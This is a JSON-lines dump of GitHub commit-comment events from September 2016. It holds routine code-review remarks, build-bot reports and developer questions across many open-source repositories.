{"id":"4554539079","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18998796,"position":58,"line":58,"path":"truffle/src/main/java/org/jruby/truffle/core/InlinedCoreMethodNode.java","commit_id":"b904bda76966fe839fe899f23320d7a75e02c5e2","created_at":"2016-09-13T09:46:54Z","updated_at":"2016-09-13T09:46:54Z","body":"I don't think startup is going to be changed much by this stuff (no much Ruby is executed during startup I would think),\r\nbut interpreter performance, warmup and peak perf can all be."}},"created_at":"2016-09-13T09:46:54Z"}
{"id":"4554549388","type":"CommitCommentEvent","actor":{"login":"SylwiaOliwia2"},"repo":{"name":"SylwiaOliwia2/Logistic_regression"},"payload":{"comment":{"id":18998810,"position":null,"line":null,"path":null,"commit_id":"2e3b96e33d83ac164809306ab8b47d9af38604ab","created_at":"2016-09-13T09:48:55Z","updated_at":"2016-09-13T09:48:55Z","body":"My first Logistic Regression.\r\nI have difficulties with high precision & low recall problem.\r\nI'm not convinced, if setting lower threshold (if prob>0.2 set 1, else 0) is a good resolution.\r\nDo not exclude syntactic bugs."}},"created_at":"2016-09-13T09:48:55Z"}
{"id":"4554551883","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998817,"position":26,"line":89,"path":"app/config/config.yml","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:49:26Z","updated_at":"2016-09-13T09:49:26Z","body":"1. Propel tutaj nie był potrzebny, więc po co go wrzucałeś?\r\n2. Nie wrzucaj haseł - przerób to na parametry, jeżeli nadal chcesz na tym branchu trzymać `propela` (IMHO nie powinieneś mieszać funkcjonalności, więc ja bym go usunął)"}},"created_at":"2016-09-13T09:49:26Z"}
{"id":"4554552174","type":"CommitCommentEvent","actor":{"login":"elmingo"},"repo":{"name":"flosell/lambdacd"},"payload":{"comment":{"id":18998819,"position":null,"line":null,"path":null,"commit_id":"8b10dc28b1081944caeb7dc96f7c8e2b7575e0bb","created_at":"2016-09-13T09:49:30Z","updated_at":"2016-09-13T09:49:30Z","body":"Hi @flosell ,\r\n\r\nShouldn't the test/clj/lambdacd/execution.clj file be in src/clj/lambdacd/execution.clj ? It's not included in the 0.9.5 JAR"}},"created_at":"2016-09-13T09:49:30Z"}
{"id":"4554552589","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998821,"position":4,"line":10,"path":"app/config/routing.yml","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:49:35Z","updated_at":"2016-09-13T09:49:35Z","body":"Po co ten `prefix`?"}},"created_at":"2016-09-13T09:49:35Z"}
{"id":"4554553949","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998823,"position":22,"line":22,"path":"src/AppBundle/Menu/Builder.php","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:49:52Z","updated_at":"2016-09-13T09:49:52Z","body":"Nie trzymamy takich komentarz w `repo` - do usunięcia "}},"created_at":"2016-09-13T09:49:52Z"}
{"id":"4554554864","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998830,"position":22,"line":22,"path":"src/Ecommerce/FrontPageBundle/Menu/Builder.php","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:50:04Z","updated_at":"2016-09-13T09:50:04Z","body":"j.w - do usunięcia"}},"created_at":"2016-09-13T09:50:04Z"}
{"id":"4554556165","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":18998831,"position":null,"line":null,"path":null,"commit_id":"51f758fb1e90a929af69de1ee45cc86e7c6913be","created_at":"2016-09-13T09:50:20Z","updated_at":"2016-09-13T09:50:20Z","body":"I was trying to maintain `client-battle` today and it's kind of harder for me to understand this code.\r\n\r\nFrom what I understand so far, I don't like `endTurn` because when I think of the end of a turn, I think of healing from Leftovers and taking Burn damage. Finishing a choice can happen anytime, even in the middle of a turn if you use U-turn."}},"created_at":"2016-09-13T09:50:20Z"}
{"id":"4554557607","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998837,"position":9,"line":8,"path":"src/Ecommerce/FrontPageBundle/Resources/views/Default/index.html.twig","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:50:36Z","updated_at":"2016-09-13T09:50:36Z","body":"Również do usunięcia, kodzik ma mieć tylko to co jest wartościowe do sprawdzenia - takie komentarze nic nie dają :)"}},"created_at":"2016-09-13T09:50:36Z"}
{"id":"4554559210","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998839,"position":18,"line":24,"path":"src/Ecommerce/FrontPageBundle/Resources/views/Default/index.html.twig","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:50:55Z","updated_at":"2016-09-13T09:50:55Z","body":"Nie wrzucaj takich rzeczy :) one tylko psują czytelność :)"}},"created_at":"2016-09-13T09:50:55Z"}
{"id":"4554560456","type":"CommitCommentEvent","actor":{"login":"pwlap"},"repo":{"name":"nurzynskipawel/ecommerce"},"payload":{"comment":{"id":18998843,"position":4,"line":7,"path":"src/Ecommerce/FrontPageBundle/Resources/views/base.html.twig","commit_id":"b926e69b49cc635d467368d23ec4c55b1591a9be","created_at":"2016-09-13T09:51:10Z","updated_at":"2016-09-13T09:51:10Z","body":"kolejna rzecz do usunięcia - sprawdzaj to co wrzucasz w `commitach`"}},"created_at":"2016-09-13T09:51:10Z"}
{"id":"4554562991","type":"CommitCommentEvent","actor":{"login":"marksamman"},"repo":{"name":"otland/forgottenserver"},"payload":{"comment":{"id":18998854,"position":null,"line":null,"path":null,"commit_id":"b7fb97cb1c9d2c92cb28d10ea0cdb0c0943a5fb1","created_at":"2016-09-13T09:51:41Z","updated_at":"2016-09-13T09:51:41Z","body":"Feel free to submit a PR that reverts the change and I'll merge it."}},"created_at":"2016-09-13T09:51:41Z"}
{"id":"4554563562","type":"CommitCommentEvent","actor":{"login":"hashwin"},"repo":{"name":"effektif/react-mentions"},"payload":{"comment":{"id":18998855,"position":null,"line":null,"path":null,"commit_id":"2f9721ff867739ee466e84edc5c63728c8b8bdea","created_at":"2016-09-13T09:51:49Z","updated_at":"2016-09-13T09:51:49Z","body":"WARNING in ./~/react-mentions/lib/OptionalRadium.js\r\nModule not found: Error: Cannot resolve module 'radium' in /Users/ashwin/code/apps/o3_crm/client/node_modules/react-mentions/lib\r\n@ ./~/react-mentions/lib/OptionalRadium.js 15:11-28"}},"created_at":"2016-09-13T09:51:49Z"}
{"id":"4554568474","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18998866,"position":4,"line":57,"path":"plugins/LayerView/LayerView.py","commit_id":"f527da2f3c309d27973ad19e2b513bed5d17e36c","created_at":"2016-09-13T09:52:49Z","updated_at":"2016-09-13T09:52:49Z","body":"Doh! Fixed it. Too much copy/paste, too little test."}},"created_at":"2016-09-13T09:52:49Z"}
{"id":"4554570187","type":"CommitCommentEvent","actor":{"login":"breadfan"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18998873,"position":null,"line":null,"path":null,"commit_id":"e943b9b10926f57863c8a29fb2f94758608c1ae5","created_at":"2016-09-13T09:53:11Z","updated_at":"2016-09-13T09:53:11Z","body":"Hi, \r\nI'm somehow unsure if this introduces problems with passing multiple values for a single parameter. Unfortunately I can't get the test suite to run on my machine.\r\n\r\nPlease try to add the following to you NettyModelConversionSpec if you also think it should work that way:\r\n`    \r\n\"parse multiple query params correctly\" in {\r\n      val (_, query) = modelConversion.parseUri(\"/?filter=a&filter=b\")\r\n      query must havePair(\"filter\" -> Seq(\"a\", \"b\"))\r\n    }\r\n`"}},"created_at":"2016-09-13T09:53:11Z"}
{"id":"4554570274","type":"CommitCommentEvent","actor":{"login":"ZigaByte"},"repo":{"name":"Jeremy-Barnes/Critters"},"payload":{"comment":{"id":18998874,"position":null,"line":null,"path":null,"commit_id":"4b9de43fa3a9fc1d1846518ab17f87d1ef34d96f","created_at":"2016-09-13T09:53:13Z","updated_at":"2016-09-13T09:53:13Z","body":"Wow. What. It worked in the desktop version ... I did use a weird method. Might not translate to JS?"}},"created_at":"2016-09-13T09:53:13Z"}
{"id":"4554572294","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":18998885,"position":null,"line":null,"path":null,"commit_id":"39710b2c69f3848cb4d2e5b06a2d575b4290447e","created_at":"2016-09-13T09:53:37Z","updated_at":"2016-09-13T09:53:37Z","body":"[R/nLTTDiff.R:205:1:](https://github.com/richelbilderbeek/nLTT/blob/39710b2c69f3848cb4d2e5b06a2d575b4290447e/R/nLTTDiff.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​nLTTstat_exact <- function(\n^~~~~~~~~~~~~~\n```\n[tests/testthat/test-nLTTstat.R:59:1:](https://github.com/richelbilderbeek/nLTT/blob/39710b2c69f3848cb4d2e5b06a2d575b4290447e/tests/testthat/test-nLTTstat.R#L59) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```"}},"created_at":"2016-09-13T09:53:37Z"}
{"id":"4554581537","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18998904,"position":null,"line":null,"path":null,"commit_id":"10b33afeec108e778c0a97e16a544cfc5377d3be","created_at":"2016-09-13T09:55:32Z","updated_at":"2016-09-13T09:55:32Z","body":"buildingunit (nmerket) - Win64-Windows-7-VisualStudio-12: Tests Failed (2084 of 2451 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-85.03%25-red.svg)</a> \n"}},"created_at":"2016-09-13T09:55:32Z"}
{"id":"4554585692","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18998924,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T09:56:23Z","updated_at":"2016-09-13T09:56:23Z","body":"@ThomasKaiser \r\nWhile I'm looking through u-boot patches - do you remember why [this](https://github.com/igorpecovnik/lib/blob/master/patch/u-boot/u-boot-default/u-boot-99-add-missing-boards.patch#L77-L78) is there?"}},"created_at":"2016-09-13T09:56:23Z"}
{"id":"4554586638","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18998926,"position":null,"line":null,"path":null,"commit_id":"a293432920fa33863747060c147f92511944b4d1","created_at":"2016-09-13T09:56:35Z","updated_at":"2016-09-13T09:56:35Z","body":"👍"}},"created_at":"2016-09-13T09:56:35Z"}
{"id":"4554593271","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18998940,"position":24,"line":62,"path":"libkrun/libkruntime.c","commit_id":"2d2045aa518831fd3b00439fb8f0ab6298273335","created_at":"2016-09-13T09:57:58Z","updated_at":"2016-09-13T09:57:58Z","body":"Can I suggest we explicitly say something like \"When running on Travis, we know we can't support XXX, so have this clause is intentionally blank\"."}},"created_at":"2016-09-13T09:57:58Z"}
{"id":"4554594614","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18998945,"position":null,"line":null,"path":null,"commit_id":"5eb0c39a3e10753d600bed5a8541490820fbbb59","created_at":"2016-09-13T09:58:16Z","updated_at":"2016-09-13T09:58:16Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5eb0c39a3e10753d600bed5a8541490820fbbb59-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5eb0c39a3e10753d600bed5a8541490820fbbb59-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T09:58:16Z"}
{"id":"4554595355","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18998946,"position":null,"line":null,"path":null,"commit_id":"24054b4de015fe8f835e126ab196d667539e7dc3","created_at":"2016-09-13T09:58:24Z","updated_at":"2016-09-13T09:58:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 984](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13156&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:48"}},"created_at":"2016-09-13T09:58:24Z"}
{"id":"4554595388","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18998947,"position":37,"line":259,"path":"libkrun/libkruntime.c","commit_id":"2d2045aa518831fd3b00439fb8f0ab6298273335","created_at":"2016-09-13T09:58:25Z","updated_at":"2016-09-13T09:58:25Z","body":"I suggest we do the # indent thing:\r\n```c\r\n#else\r\n#    error \"...\"\r\n#endif\r\n```"}},"created_at":"2016-09-13T09:58:25Z"}
{"id":"4554595821","type":"CommitCommentEvent","actor":{"login":"schmitch"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18998949,"position":null,"line":null,"path":null,"commit_id":"e943b9b10926f57863c8a29fb2f94758608c1ae5","created_at":"2016-09-13T09:58:29Z","updated_at":"2016-09-13T09:58:29Z","body":"yeah it looks like this needs to revisited."}},"created_at":"2016-09-13T09:58:29Z"}
{"id":"4554597157","type":"CommitCommentEvent","actor":{"login":"ahuarte47"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18998953,"position":31,"line":31,"path":"src/core/qgsoptionalexpression.h","commit_id":"8cf0ef93c454a02362377e5bce2d8c8c8b6015a4","created_at":"2016-09-13T09:58:45Z","updated_at":"2016-09-13T09:58:45Z","body":"Hi @m-kuhn, I can't build QGIS in vs2010 and vs2015 from this commit. I get these unresolve external symbols.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/5576272/18469487/aa248538-79a8-11e6-8690-d7ef1d4174fe.png)\r\n\r\nWhat can I do to resolve it? I should create a new bug entry in the issues repo?\r\nThanks in advance\r\n"}},"created_at":"2016-09-13T09:58:45Z"}
{"id":"4554598003","type":"CommitCommentEvent","actor":{"login":"rgilles"},"repo":{"name":"google/flatbuffers"},"payload":{"comment":{"id":18998954,"position":null,"line":null,"path":null,"commit_id":"9f16090f901c30f872422f60db21a0370dde8bbf","created_at":"2016-09-13T09:58:55Z","updated_at":"2016-09-13T09:58:55Z","body":"Hi Raman,\r\nI'm trying to implement the Java reflection API. End I do not exactly understand how to use the lookupByKey method outside the code that create the byte buffer.\r\nYou can find an example how I found a way to do it here: https://github.com/google/flatbuffers/pull/4019/commits/a47c196186c77c5a75ec0d50dd8ad3f8f57ff2b8#diff-2639ea941ffecded7ab3a5c50281475aR92 (Object#field(String))\r\nThis is just a trial of how we can make it by generation but not sure it is write way.\r\nCould you please check and let me know if it is what you think it should be?\r\n\r\nThanks in advance,\r\n\r\nRomain"}},"created_at":"2016-09-13T09:58:55Z"}
{"id":"4559055164","type":"CommitCommentEvent","actor":{"login":"agarwa13"},"repo":{"name":"laravel/installer"},"payload":{"comment":{"id":19011046,"position":null,"line":null,"path":null,"commit_id":"04e92389f66dd6de831704b930ff70fae7a65b72","created_at":"2016-09-14T00:02:20Z","updated_at":"2016-09-14T00:02:20Z","body":"Has this update made its way to packagist? (Pardon my ignorance). I am installing the laravel installer using composer. Composer thinks it is installing 1.3.4 but when I look at this file in my installation I see the older version where it says 1.3.3. Terribly confused."}},"created_at":"2016-09-14T00:02:20Z"}
{"id":"4559056280","type":"CommitCommentEvent","actor":{"login":"diasdavid"},"repo":{"name":"libp2p/pubsub-notes"},"payload":{"comment":{"id":19011050,"position":null,"line":null,"path":null,"commit_id":"02443a35256fb6fb521c741009de1488c2a99448","created_at":"2016-09-14T00:02:41Z","updated_at":"2016-09-14T00:02:41Z","body":"ACK"}},"created_at":"2016-09-14T00:02:41Z"}
{"id":"4559057269","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011051,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-14T00:02:58Z","updated_at":"2016-09-14T00:02:58Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T00:02:58Z"}
{"id":"4559061131","type":"CommitCommentEvent","actor":{"login":"rafaelfranca"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19011057,"position":null,"line":null,"path":null,"commit_id":"fbd1e98cf983572ca9884f17f933ffe92833632a","created_at":"2016-09-14T00:04:06Z","updated_at":"2016-09-14T00:04:06Z","body":"But I did backported to all branches cbb6a2670ee775531ec92301998be3b824648e7f"}},"created_at":"2016-09-14T00:04:06Z"}
{"id":"4559062490","type":"CommitCommentEvent","actor":{"login":"rafaelfranca"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19011060,"position":5,"line":245,"path":"railties/lib/rails/generators/app_base.rb","commit_id":"fbd1e98cf983572ca9884f17f933ffe92833632a","created_at":"2016-09-14T00:04:28Z","updated_at":"2016-09-14T00:04:28Z","body":"This is a forward port from 5-0-stable, I'll fix it on master."}},"created_at":"2016-09-14T00:04:28Z"}
{"id":"4559066288","type":"CommitCommentEvent","actor":{"login":"zarvox"},"repo":{"name":"liamzdenek/phabricator-sandstorm"},"payload":{"comment":{"id":19011061,"position":4,"line":18,"path":".sandstorm/sandstorm-files.list","commit_id":"9506c530e9516e38f12b535e1148646aed5c3e3b","created_at":"2016-09-14T00:05:28Z","updated_at":"2016-09-14T00:05:28Z","body":"I think you still want this file in the package, no?"}},"created_at":"2016-09-14T00:05:28Z"}
{"id":"4559066717","type":"CommitCommentEvent","actor":{"login":"rastapasta"},"repo":{"name":"alangecker/foodsaving-frontend"},"payload":{"comment":{"id":19011062,"position":null,"line":null,"path":null,"commit_id":"aba8699819009a95720f20166bb09568f5cd4142","created_at":"2016-09-14T00:05:36Z","updated_at":"2016-09-14T00:05:36Z","body":"fleissig, fleissig! 😄  ❤️ "}},"created_at":"2016-09-14T00:05:36Z"}
{"id":"4559068657","type":"CommitCommentEvent","actor":{"login":"zarvox"},"repo":{"name":"liamzdenek/phabricator-sandstorm"},"payload":{"comment":{"id":19011068,"position":4,"line":18,"path":".sandstorm/sandstorm-files.list","commit_id":"9506c530e9516e38f12b535e1148646aed5c3e3b","created_at":"2016-09-14T00:06:12Z","updated_at":"2016-09-14T00:06:12Z","body":"Oh, no, not the one in `bin/`, never mind."}},"created_at":"2016-09-14T00:06:12Z"}
{"id":"4559071387","type":"CommitCommentEvent","actor":{"login":"zarvox"},"repo":{"name":"liamzdenek/phabricator-sandstorm"},"payload":{"comment":{"id":19011073,"position":20,"line":196,"path":".sandstorm/sandstorm-files.list","commit_id":"9506c530e9516e38f12b535e1148646aed5c3e3b","created_at":"2016-09-14T00:07:02Z","updated_at":"2016-09-14T00:07:02Z","body":"this wrapper script probably needs to get created in `setup.sh` and should get added back to the package, though"}},"created_at":"2016-09-14T00:07:02Z"}
{"id":"4559071930","type":"CommitCommentEvent","actor":{"login":"justinvp"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19011075,"position":4,"line":12,"path":"src/System.IO.FileSystem/tests/FileStream/CopyToAsync.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-14T00:07:12Z","updated_at":"2016-09-14T00:07:12Z","body":"I'm just waiting on you guys. What's the process for getting https://github.com/dotnet/buildtools/pull/1000 merged and into the next buildtools update?"}},"created_at":"2016-09-14T00:07:12Z"}
{"id":"4559082375","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":19011093,"position":null,"line":null,"path":null,"commit_id":"7f73203572b1835588bfe3f705b3e898a107dc42","created_at":"2016-09-14T00:10:32Z","updated_at":"2016-09-14T00:10:32Z","body":"I thought I tested and the didStop method was called, with `completed:NO`. That's the point of the `completed` param."}},"created_at":"2016-09-14T00:10:32Z"}
{"id":"4559086095","type":"CommitCommentEvent","actor":{"login":"supairish"},"repo":{"name":"galetahub/ckeditor"},"payload":{"comment":{"id":19011100,"position":null,"line":null,"path":null,"commit_id":"8b5d21d1a8727e2b9e1dba505f04b485ba840d37","created_at":"2016-09-14T00:11:45Z","updated_at":"2016-09-14T00:11:45Z","body":"Having same problem in my app, this needs reverting."}},"created_at":"2016-09-14T00:11:45Z"}
{"id":"4559087555","type":"CommitCommentEvent","actor":{"login":"weshaggard"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19011103,"position":4,"line":12,"path":"src/System.IO.FileSystem/tests/FileStream/CopyToAsync.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-14T00:12:12Z","updated_at":"2016-09-14T00:12:12Z","body":"Sorry I forgot to merge that PR, I just did though and a new set of BuildTool packages should get dropped on myget soon. Once that is dropped then we can update the packages in corefx and make the source changes. "}},"created_at":"2016-09-14T00:12:12Z"}
{"id":"4559092759","type":"CommitCommentEvent","actor":{"login":"chrislovecnm"},"repo":{"name":"DualSpark/kops"},"payload":{"comment":{"id":19011120,"position":31,"line":95,"path":"cmd/kops/create_cluster.go","commit_id":"1b48258c6c62a6feec84ce936c96439f87bb3351","created_at":"2016-09-14T00:13:54Z","updated_at":"2016-09-14T00:13:54Z","body":"\"-f, --filename=[]: Filename, or URL to file to use to create the resource\""}},"created_at":"2016-09-14T00:13:54Z"}
{"id":"4559094843","type":"CommitCommentEvent","actor":{"login":"justinvp"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":19011125,"position":4,"line":12,"path":"src/System.IO.FileSystem/tests/FileStream/CopyToAsync.cs","commit_id":"ed8347041878054db7707d54201779ccba967782","created_at":"2016-09-14T00:14:33Z","updated_at":"2016-09-14T00:14:33Z","body":"Sounds good. Thanks."}},"created_at":"2016-09-14T00:14:33Z"}
{"id":"4559104256","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19011144,"position":null,"line":null,"path":null,"commit_id":"520dbed3faabe57b1e4e5f079f2ce884f1e7ca0a","created_at":"2016-09-14T00:17:27Z","updated_at":"2016-09-14T00:17:27Z","body":"looks good to me... let's commit to master and test it out!"}},"created_at":"2016-09-14T00:17:27Z"}
{"id":"4559107136","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19011150,"position":null,"line":null,"path":null,"commit_id":"65e0751e0100560d7adebfe98e735b17febe8e1d","created_at":"2016-09-14T00:18:21Z","updated_at":"2016-09-14T00:18:21Z","body":"while testing a ruleset, the author may share a function named `__testing` which defines the queries and events she would like to have set up on the Testing tab\r\n\r\nas can be seen in the two built-in rulesets, this need not include all of the functions/rules in the ruleset, but only those desired"}},"created_at":"2016-09-14T00:18:21Z"}
{"id":"4559112986","type":"CommitCommentEvent","actor":{"login":"scottvidmar"},"repo":{"name":"DualSpark/kops"},"payload":{"comment":{"id":19011159,"position":3,"line":3,"path":"create_example.yml","commit_id":"1b48258c6c62a6feec84ce936c96439f87bb3351","created_at":"2016-09-14T00:20:09Z","updated_at":"2016-09-14T00:20:09Z","body":"This is pretty obscure. Is this the delete override? If so, we control that, right? If so, can we name that something more descriptive?"}},"created_at":"2016-09-14T00:20:09Z"}
{"id":"4559120255","type":"CommitCommentEvent","actor":{"login":"felixyf0124"},"repo":{"name":"Big-Buddy/Project-Fate-Generator"},"payload":{"comment":{"id":19011168,"position":null,"line":null,"path":null,"commit_id":"b40ac89d7fc9fd5b11ae2a014ac0e6cac9d6e22f","created_at":"2016-09-14T00:22:24Z","updated_at":"2016-09-14T00:22:24Z","body":"[Deliverable 0 SOEN 341.docx](https://github.com/Big-Buddy/Project-Fate-Generator/files/471033/Deliverable.0.SOEN.341.docx)\r\nI already added my name and student ID in the new file\r\nand my prefered position would be mix\r\n"}},"created_at":"2016-09-14T00:22:24Z"}
{"id":"4559120544","type":"CommitCommentEvent","actor":{"login":"LV"},"repo":{"name":"LV/UnblurScribd-Userscript"},"payload":{"comment":{"id":19011170,"position":null,"line":null,"path":null,"commit_id":"75e72490cc508e6cd9658669694771d8095976e5","created_at":"2016-09-14T00:22:29Z","updated_at":"2016-09-14T00:22:29Z","body":"I meant `meta.js` instead of `user.js`"}},"created_at":"2016-09-14T00:22:29Z"}
{"id":"4559130256","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19011182,"position":null,"line":null,"path":null,"commit_id":"08887ef36c59caa0ae62a939cdd8207d19abb4e6","created_at":"2016-09-14T00:25:36Z","updated_at":"2016-09-14T00:25:36Z","body":"RobiNNN, https://www.w3.org/TR/wai-aria/states_and_properties"}},"created_at":"2016-09-14T00:25:36Z"}
{"id":"4559135674","type":"CommitCommentEvent","actor":{"login":"ncorai"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19011191,"position":14,"line":40,"path":"language/src/ceylon/language/StringBuilder.ceylon","commit_id":"c3ac9afe0c2d02b1967ffe7234b343994fa9a544","created_at":"2016-09-14T00:27:23Z","updated_at":"2016-09-14T00:27:23Z","body":"Does not seem to be committed to the 1.3.0 branch"}},"created_at":"2016-09-14T00:27:23Z"}
{"id":"4559141171","type":"CommitCommentEvent","actor":{"login":"cartazio"},"repo":{"name":"haskell/vector"},"payload":{"comment":{"id":19011204,"position":null,"line":null,"path":null,"commit_id":"31edb3fc51e76facc1e291f1e9e721663d91dbd8","created_at":"2016-09-14T00:29:07Z","updated_at":"2016-09-14T00:29:07Z","body":"@bergmark could you open a ticket for that :)"}},"created_at":"2016-09-14T00:29:07Z"}
{"id":"4559145907","type":"CommitCommentEvent","actor":{"login":"fwhem"},"repo":{"name":"PureNexusProject/manifest"},"payload":{"comment":{"id":19011212,"position":null,"line":null,"path":null,"commit_id":"8a81914428f6cc88209b89c24e85781ce2ed313b","created_at":"2016-09-14T00:30:37Z","updated_at":"2016-09-14T00:30:37Z","body":"You gonna have to change to Pure Pixel pretty soon. :)"}},"created_at":"2016-09-14T00:30:37Z"}
{"id":"4559152371","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011224,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-14T00:32:39Z","updated_at":"2016-09-14T00:32:39Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-14T00:32:39Z"}
